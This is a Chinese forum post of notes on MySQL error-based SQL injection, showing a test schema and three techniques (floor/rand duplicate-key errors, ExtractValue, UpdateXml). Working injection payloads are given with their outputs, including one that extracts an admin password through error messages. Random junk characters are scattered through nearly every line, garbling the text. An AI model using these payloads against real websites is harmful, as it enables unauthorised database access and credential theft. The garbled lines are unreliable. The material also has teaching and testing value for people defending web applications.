放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
5 V" r1 ~0 Q% Y; R8 U- d实际测试环境:
& H9 h0 R+ {# p. g/ D1 `. ^# N. h! |8 j$ t: b
9 o. C6 R3 X2 o- j) [mysql> show tables;
& A% g7 p U* G9 n+ T- M+ A+----------------+
" l9 F8 j! s& `5 l; d| Tables_in_test |& i, }1 \2 g6 H6 V. ]2 K
+----------------+( j4 q$ {9 `6 `# r J" o! K
| admin |
( ?+ L b$ i/ G4 |# s| article |- f- i7 _1 |/ G0 @: p
+----------------+, k1 ?, o& W( v! E. H
+ E! z2 m! J+ [) N' F/ W- r9 s
+ o: K. V( @ e# A* Y4 U* @
5 f/ A8 G5 r$ K. V
mysql> describe admin;
* Z: P i p6 J N+-------+------------------+------+-----+---------+----------------+
, U7 G4 y* h7 Y+ w5 H| Field | Type | Null | Key | Default | Extra |3 F4 B6 r" Q8 [1 X# H
+-------+------------------+------+-----+---------+----------------+( f3 L9 n0 q8 Y1 _
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |) x: R9 i! m. [ g+ H5 a
| user | varchar(50) | NO | | NULL | |! I9 ?7 Z5 m' L5 x5 t
| pass | varchar(50) | NO | | NULL | |* I, V' V% s* w4 K
+-------+------------------+------+-----+---------+----------------+8 w. }1 S: u" u/ Z9 O
; F2 v, |8 k3 E
! U( v0 ~, n$ [ \7 O* k7 V" z g$ s% d5 P2 I f# i( B
mysql> describe article;. f) n* F, C6 }2 s/ u- W$ f
+---------+------------------+------+-----+---------+----------------+
! J4 Y! `/ x5 ^# i: r L* {: Q| Field | Type | Null | Key | Default | Extra |. ~' f+ U8 W1 p6 j
+---------+------------------+------+-----+---------+----------------+- A" u; @3 V8 w; m# }* ?$ V
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
' L6 k+ i4 z1 R9 }; K' `| title | varchar(50) | NO | | NULL | |2 u% f; l9 ^0 Y0 Y5 o% }
| content | varchar(50) | NO | | NULL | |
- g+ z3 W0 N* t! s* F+---------+------------------+------+-----+---------+----------------+ {8 S$ O+ I n6 M6 ] u$ |
1、通过floor报错' _+ ^: k0 U2 u& V& X- \
可以通过如下一些利用代码
( z7 ?% T; w9 O* h" ^" f
8 t2 U. j \& {, n; @) d 8 I+ ?8 `) i1 G5 U2 e+ V
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
' [6 ]" _# o" F2 Zfrom information_schema.tables group by x)a);# l9 F5 t. w' t' y
6 r+ O8 l7 z& Q8 x* l* u
4 k% d8 e5 K1 C8 x- W
and (select count(*) from (select 1 union select null union select !1)x
) c- X" e4 J/ Fgroup by concat((select table_name from information_schema.tables limit 1),' h, Q9 p+ K. {$ R6 I( P" d. w% ]4 B
floor(rand(0)*2)));6 l, z+ D8 u' a, o1 T
举例如下:* \; Q' w/ |+ ^& {3 \* ]$ Q6 ~8 T- b
首先进行正常查询:. Q" b( M+ N" @' f4 U, L. J3 X
& ?2 Q" @% T& x, F4 {7 m' o% S0 ~
mysql> select * from article where id = 1;5 B: i4 M5 c5 n# J
+----+-------+---------+3 g/ d5 Y6 P7 N, W' Y' r6 C
| id | title | content |
4 G$ [3 i" i0 N& G; b5 w+----+-------+---------+) n9 M/ S5 A! I/ z
| 1 | test | do it |
& W7 N6 z6 n0 ] F0 i: c6 J. j+----+-------+---------+
4 H# w' s7 m1 {: p7 {2 i假如id输入存在注入的话,可以通过如下语句进行报错。
0 s/ S" Y6 z0 P ) P, }5 m! H: S8 ^6 c+ Y
/ l) |( l1 U1 e2 E6 vmysql> select * from article where id = 1 and (select 1 from
4 N9 y6 p" h6 H2 w% B6 h(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
4 J# @% ^2 J2 U8 u. AERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'& w. T m: {; }' r: t8 X
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
4 ]& \9 W8 \' d |# K( K9 Z例如我们需要查询管理员用户名和密码:/ S- R ]# D5 a
Method1:7 g4 W6 o+ ~+ F- N
3 x0 n4 o! O7 a. M6 Y. R' s
4 r- u0 p6 s5 D6 V# j; E0 o
mysql> select * from article where id = 1 and (select 1 from' n! D* p1 ]/ j7 t+ P
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x3 R& g% \: k" o4 s% G) a- `4 b
from information_schema.tables group by x)a);; g! t7 e/ U* r* x8 C; ^, Y, T
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'7 K4 i( u. B! x. l' p6 F; J+ @
Method2:1 g, ^" x1 O1 `7 a
" X/ S- m) \& r& M3 {0 z; h" F$ w; X
+ [; J4 {" f& s) Fmysql> select * from article where id = 1 and (select count(*)& a0 v4 A/ ?- m, y
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),- _% e7 x, N$ W( ~9 ]% F- e6 I5 ]
floor(rand(0)*2)));
/ h" ]8 `5 M! |6 `ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
) o, ?5 w5 G* I7 K/ L, c$ p4 Z2、ExtractValue, s6 @5 K% z6 ^% w1 O2 q
测试语句如下
- ?% J+ ~/ q" H7 v$ L2 Y / D; l3 c7 E9 H$ P! p
9 V0 `) R# F% N4 j/ j5 {and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));7 A; p; e; r- m; l( ]. o
实际测试过程
) \' k1 ~# }% f) u3 j 4 j3 ? q/ k. `2 a) x; o
( T7 u, t. E3 O7 D/ F/ f' l, tmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
% Z" m8 j9 C) K- x; y( X(select pass from admin limit 1)));--* f7 D# S: v8 ]* R
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3 R G; e" e8 V; ^; d3、UpdateXml+ K J' Z+ l+ |7 x( W$ B
测试语句
, x8 X! y2 C# `- `. l : D% r, G% m5 v7 q; N( D
; J2 x3 Q) J7 c) L
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))& E" M+ ]4 p" Z+ m3 A: e5 w
实际测试过程
' r T* n2 K; R9 w2 F. u
% A: B* v4 K6 L* u; |$ x0 X7 A$ j
7 I% x, Q0 f3 i6 `6 e9 Amysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
: Q c1 D8 J0 ^, K' E(select pass from admin limit 1),0x5e24),1));
; L, O0 d9 h( ~& @/ [6 S, K# x( AERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'! G% I+ |6 w$ [* k
All, thanks foreign guys.
( s9 v0 Q* {8 M; k) ~& E! b
; R3 A- R) S3 J6 m7 n# Z9 B8 X9 i' i7 H& b3 i) y& c
|
发表于 2012-12-10 10:28:51
收藏
支持
反对